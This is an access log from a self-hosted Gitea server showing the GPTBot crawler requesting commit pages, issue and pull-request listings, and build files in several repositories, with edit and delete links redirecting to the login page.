"/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2ftest_run.bat" [Client 74.7.227.38] [Length 21922] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" +[17/Feb/2026:19:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2fbuild_exe.bat" [Client 74.7.227.38] [Length 23135] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" +[17/Feb/2026:19:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11306] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:19:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13945] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:19:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72700] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72701] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123724] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72052] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 71664] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 122745] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123728] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72049] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72699] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 122739] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123726] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72702] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123728] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" +[17/Feb/2026:19:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?state=closed&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:19:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:19:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11241] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:19:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11171] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:19:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10056] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:22:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:19:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:19:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11249] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:19:22:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:19:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:19:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9869] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:19:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:19:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 